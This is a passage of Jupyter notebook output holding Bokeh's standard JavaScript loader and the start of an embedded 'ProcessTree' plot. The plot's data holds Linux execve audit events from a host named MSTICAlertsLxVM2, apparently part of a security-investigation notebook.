{\n", " var output_area = handle.output_area;\n", " var output = handle.output;\n", "\n", " // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n", " if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n", " return\n", " }\n", "\n", " var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n", "\n", " if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n", " toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n", " // store reference to embed id on output_area\n", " output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n", " }\n", " if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n", " var bk_div = document.createElement(\"div\");\n", " bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n", " var script_attrs = bk_div.children[0].attributes;\n", " for (var i = 0; i < script_attrs.length; i++) {\n", " toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n", " toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n", " }\n", " // store reference to server id on output_area\n", " output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n", " }\n", " }\n", "\n", " function register_renderer(events, OutputArea) {\n", "\n", " function append_mime(data, metadata, element) {\n", " // create a DOM node to render to\n", " var toinsert = this.create_output_subarea(\n", " metadata,\n", " CLASS_NAME,\n", " EXEC_MIME_TYPE\n", " );\n", " this.keyboard_manager.register_events(toinsert);\n", " // Render to node\n", " var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n", " render(props, toinsert[toinsert.length - 1]);\n", " element.append(toinsert);\n", " return toinsert\n", " }\n", "\n", " /* Handle when an output is cleared or removed */\n", " events.on('clear_output.CodeCell', handleClearOutput);\n", " events.on('delete.Cell', handleClearOutput);\n", "\n", " /* Handle when a new output is added */\n", " events.on('output_added.OutputArea', handleAddOutput);\n", "\n", " /**\n", " * Register the mime type and append_mime function with output_area\n", " */\n", " OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n", " /* Is output safe? */\n", " safe: true,\n", " /* Index of renderer in `output_area.display_order` */\n", " index: 0\n", " });\n", " }\n", "\n", " // register the mime type if in Jupyter Notebook environment and previously unregistered\n", " if (root.Jupyter !== undefined) {\n", " var events = require('base/js/events');\n", " var OutputArea = require('notebook/js/outputarea').OutputArea;\n", "\n", " if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n", " register_renderer(events, OutputArea);\n", " }\n", " }\n", "\n", " \n", " if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n", " root._bokeh_timeout = Date.now() + 5000;\n", " root._bokeh_failed_load = false;\n", " }\n", "\n", " var NB_LOAD_WARNING = {'data': {'text/html':\n", " \"
\\n\"+\n", " \"

\\n\"+\n", " \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n", " \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n", " \"

\\n\"+\n", " \"\\n\"+\n", " \"\\n\"+\n", " \"from bokeh.resources import INLINE\\n\"+\n", " \"output_notebook(resources=INLINE)\\n\"+\n", " \"\\n\"+\n", " \"
\"}};\n", "\n", " function display_loaded() {\n", " var el = document.getElementById(\"1346\");\n", " if (el != null) {\n", " el.textContent = \"BokehJS is loading...\";\n", " }\n", " if (root.Bokeh !== undefined) {\n", " if (el != null) {\n", " el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n", " }\n", " } else if (Date.now() < root._bokeh_timeout) {\n", " setTimeout(display_loaded, 100)\n", " }\n", " }\n", "\n", "\n", " function run_callbacks() {\n", " try {\n", " root._bokeh_onload_callbacks.forEach(function(callback) {\n", " if (callback != null)\n", " callback();\n", " });\n", " } finally {\n", " delete root._bokeh_onload_callbacks\n", " }\n", " console.debug(\"Bokeh: all callbacks have finished\");\n", " }\n", "\n", " function load_libs(css_urls, js_urls, callback) {\n", " if (css_urls == null) css_urls = [];\n", " if (js_urls == null) js_urls = [];\n", "\n", " root._bokeh_onload_callbacks.push(callback);\n", " if (root._bokeh_is_loading > 0) {\n", " console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n", " return null;\n", " }\n", " if (js_urls == null || js_urls.length === 0) {\n", " run_callbacks();\n", " return null;\n", " }\n", " console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n", " root._bokeh_is_loading = css_urls.length + js_urls.length;\n", "\n", " function on_load() {\n", " root._bokeh_is_loading--;\n", " if (root._bokeh_is_loading === 0) {\n", " console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n", " run_callbacks()\n", " }\n", " }\n", "\n", " function on_error() {\n", " console.error(\"failed to load \" + url);\n", " }\n", "\n", " for (var i = 0; i < css_urls.length; i++) {\n", " var url = css_urls[i];\n", " const element = document.createElement(\"link\");\n", " element.onload = on_load;\n", " element.onerror = on_error;\n", " element.rel = \"stylesheet\";\n", " element.type = \"text/css\";\n", " element.href = url;\n", " console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n", " document.body.appendChild(element);\n", " }\n", "\n", " const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n", "\n", " for (var i = 0; i < js_urls.length; i++) {\n", " var url = js_urls[i];\n", " var element = document.createElement('script');\n", " element.onload = on_load;\n", " element.onerror = on_error;\n", " element.async = false;\n", " element.src = url;\n", " if (url in hashes) {\n", " element.crossOrigin = \"anonymous\";\n", " element.integrity = \"sha384-\" + hashes[url];\n", " }\n", " console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n", " document.head.appendChild(element);\n", " }\n", " };\n", "\n", " function inject_raw_css(css) {\n", " const element = document.createElement(\"style\");\n", " element.appendChild(document.createTextNode(css));\n", " document.body.appendChild(element);\n", " }\n", "\n", " \n", " var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n", " var css_urls = [];\n", " \n", "\n", " var inline_js = [\n", " function(Bokeh) {\n", " Bokeh.set_log_level(\"info\");\n", " },\n", " function(Bokeh) {\n", " \n", " \n", " }\n", " ];\n", "\n", " function run_inline_js() {\n", " \n", " if (root.Bokeh !== undefined || force === true) {\n", " \n", " for (var i = 0; i < inline_js.length; i++) {\n", " inline_js[i].call(root, root.Bokeh);\n", " }\n", " if (force === true) {\n", " display_loaded();\n", " }} else if (Date.now() < root._bokeh_timeout) {\n", " setTimeout(run_inline_js, 100);\n", " } else if (!root._bokeh_failed_load) {\n", " console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n", " root._bokeh_failed_load = true;\n", " } else if (force !== true) {\n", " var cell = $(document.getElementById(\"1346\")).parents('.cell').data().cell;\n", " cell.output_area.append_execute_result(NB_LOAD_WARNING)\n", " }\n", "\n", " }\n", "\n", " if (root._bokeh_is_loading === 0) {\n", " console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n", " run_inline_js();\n", " } else {\n", " load_libs(css_urls, js_urls, function() {\n", " console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n", " run_inline_js();\n", " });\n", " }\n", "}(window));" ], "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n \n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(\"1346\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error() {\n console.error(\"failed to load \" + url);\n }\n\n for (var i = 0; i < css_urls.length; i++) {\n var url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error;\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n\n for (var i = 0; i < js_urls.length; i++) {\n var url = js_urls[i];\n var element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error;\n element.async = false;\n element.src = url;\n if (url in hashes) {\n element.crossOrigin = \"anonymous\";\n element.integrity = \"sha384-\" + hashes[url];\n }\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(\"1346\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": [ "(function(root) {\n", " function embed_document(root) {\n", " \n", " var docs_json = {\"c62c8479-2d7c-4a96-985d-15f02ffa9f16\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1349\"},{\"id\":\"1419\"}]},\"id\":\"1461\",\"type\":\"Row\"},{\"attributes\":{\"formatter\":{\"id\":\"1469\"},\"ticker\":{\"id\":\"1433\"},\"visible\":false},\"id\":\"1432\",\"type\":\"LinearAxis\"},{\"attributes\":{\"callback\":null},\"id\":\"1371\",\"type\":\"TapTool\"},{\"attributes\":{\"below\":[{\"id\":\"1360\"}],\"center\":[{\"id\":\"1363\"},{\"id\":\"1367\"},{\"id\":\"1392\"}],\"left\":[{\"id\":\"1364\"}],\"outline_line_color\":null,\"plot_height\":700,\"plot_width\":900,\"renderers\":[{\"id\":\"1383\"},{\"id\":\"1399\"},{\"id\":\"1406\"},{\"id\":\"1413\"}],\"title\":{\"id\":\"1350\"},\"toolbar\":{\"id\":\"1372\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1352\"},\"x_scale\":{\"id\":\"1356\"},\"y_range\":{\"id\":\"1354\"},\"y_scale\":{\"id\":\"1358\"}},\"id\":\"1349\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"data_source\":{\"id\":\"1347\"},\"glyph\":{\"id\":\"1452\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1453\"},\"selection_glyph\":null,\"view\":{\"id\":\"1455\"}},\"id\":\"1454\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"1347\"}},\"id\":\"1400\",\"type\":\"CDSView\"},{\"attributes\":{\"factors\":[\"/\"],\"palette\":[\"#440154\",\"#208F8C\",\"#FDE724\"]},\"id\":\"1348\",\"type\":\"CategoricalColorMapper\"},{\"attributes\":{},\"id\":\"1433\",\"type\":\"BasicTicker\"},{\"attributes\":{\"source\":{\"id\":\"1347\"}},\"id\":\"1455\",\"type\":\"CDSView\"},{\"attributes\":{\"range\":{\"id\":\"1352\"},\"value\":0.1},\"id\":\"1401\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":\"ProcessTree\"},\"id\":\"1350\",\"type\":\"Title\"},{\"attributes\":{\"axis\":{\"id\":\"1432\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1435\",\"type\":\"Grid\"},{\"attributes\":{\"overlay\":{\"id\":\"1457\"},\"x_range\":null,\"y_range\":{\"id\":\"1354\"}},\"id\":\"1456\",\"type\":\"RangeTool\"},{\"attributes\":{\"data_source\":{\"id\":\"1347\"},\"glyph\":{\"id\":\"1381\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1382\"},\"selection_glyph\":null,\"view\":{\"id\":\"1384\"}},\"id\":\"1383\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"range\":{\"id\":\"1354\"},\"value\":0.25},\"id\":\"1402\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1358\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"cwd\",\"transform\":{\"id\":\"1348\"}},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1450\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1452\",\"type\":\"Rect\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1457\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"source\":{\"id\":\"1347\"}},\"id\":\"1384\",\"type\":\"CDSView\"},{\"attributes\":{\"formatter\":{\"id\":\"1471\"},\"ticker\":{\"id\":\"1429\"},\"visible\":false},\"id\":\"1428\",\"type\":\"LinearAxis\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"field\":\"cwd\",\"transform\":{\"id\":\"1348\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1379\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1381\",\"type\":\"Rect\"},{\"attributes\":{\"end\":8,\"start\":1},\"id\":\"1352\",\"type\":\"Range1d\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"cwd\",\"transform\":{\"id\":\"1348\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1379\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1382\",\"type\":\"Rect\"},{\"attributes\":{\"source\":{\"id\":\"1347\"}},\"id\":\"1407\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1436\",\"type\":\"PanTool\"},{\"attributes\":{\"end\":65,\"start\":44},\"id\":\"1354\",\"type\":\"Range1d\"},{\"attributes\":{\"text\":\"\"},\"id\":\"1464\",\"type\":\"Title\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1401\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1402\"}}},\"id\":\"1405\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1387\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"data_source\":{\"id\":\"1347\"},\"glyph\":{\"id\":\"1404\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1405\"},\"selection_glyph\":null,\"view\":{\"id\":\"1407\"}},\"id\":\"1406\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1437\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1356\",\"type\":\"LinearScale\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1401\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1402\"}}},\"id\":\"1404\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1389\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1469\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"overlay\":{\"id\":\"1442\"}},\"id\":\"1438\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1471\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1390\",\"type\":\"Selection\"},{\"attributes\":{\"ticks\":[1,2,3,4,5]},\"id\":\"1415\",\"type\":\"FixedTicker\"},{\"attributes\":{},\"id\":\"1439\",\"type\":\"SaveTool\"},{\"attributes\":{\"range\":{\"id\":\"1352\"},\"value\":1.8},\"id\":\"1408\",\"type\":\"Dodge\"},{\"attributes\":{\"axis_line_color\":null,\"formatter\":{\"id\":\"1387\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1365\"},\"visible\":false},\"id\":\"1364\",\"type\":\"LinearAxis\"},{\"attributes\":{\"range\":{\"id\":\"1352\"},\"value\":1.75},\"id\":\"1379\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1391\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"1383\"}],\"tooltips\":[[\"Process\",\"@exe\"],[\"PID\",\"@PID\"],[\"CmdLine\",\"@cmdline\"],[\"SubjUser\",\"@acct\"],[\"SubjLgnId\",\"@ses\"],[\"TargLgnId\",\"@None\"],[\"Time\",\"@TimeGenerated{%F %T}\"]]},\"id\":\"1377\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"1440\",\"type\":\"ResetTool\"},{\"attributes\":{\"range\":{\"id\":\"1354\"},\"value\":0.25},\"id\":\"1409\",\"type\":\"Dodge\"},{\"attributes\":{\"below\":[{\"id\":\"1428\"}],\"center\":[{\"id\":\"1431\"},{\"id\":\"1435\"}],\"left\":[{\"id\":\"1432\"}],\"plot_height\":700,\"plot_width\":90,\"renderers\":[{\"id\":\"1454\"}],\"title\":{\"id\":\"1464\"},\"toolbar\":{\"id\":\"1443\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1420\"},\"x_scale\":{\"id\":\"1424\"},\"y_range\":{\"id\":\"1422\"},\"y_scale\":{\"id\":\"1426\"}},\"id\":\"1419\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"items\":[{\"id\":\"1393\"}],\"title\":\"cwd\"},\"id\":\"1392\",\"type\":\"Legend\"},{\"attributes\":{\"axis_line_color\":null,\"formatter\":{\"id\":\"1389\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1415\"},\"visible\":false},\"id\":\"1360\",\"type\":\"LinearAxis\"},{\"attributes\":{\"end\":65,\"start\":-1},\"id\":\"1422\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1369\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1426\",\"type\":\"LinearScale\"},{\"attributes\":{\"ticks\":[1,2,3,4,5]},\"id\":\"1417\",\"type\":\"FixedTicker\"},{\"attributes\":{\"label\":{\"field\":\"cwd\"},\"renderers\":[{\"id\":\"1383\"}]},\"id\":\"1393\",\"type\":\"LegendItem\"},{\"attributes\":{},\"id\":\"1441\",\"type\":\"HelpTool\"},{\"attributes\":{\"axis\":{\"id\":\"1364\"},\"dimension\":1,\"grid_line_color\":\"navy\",\"ticker\":null,\"visible\":false},\"id\":\"1367\",\"type\":\"Grid\"},{\"attributes\":{\"data\":{\"Computer\":[\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\",\"MSTICAlertsLxVM2\"],\"EffectiveLogonId\":[\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\"],\"EffectiveLogonId_par\":[\"NaN\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\"],\"EventID\":[\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXEC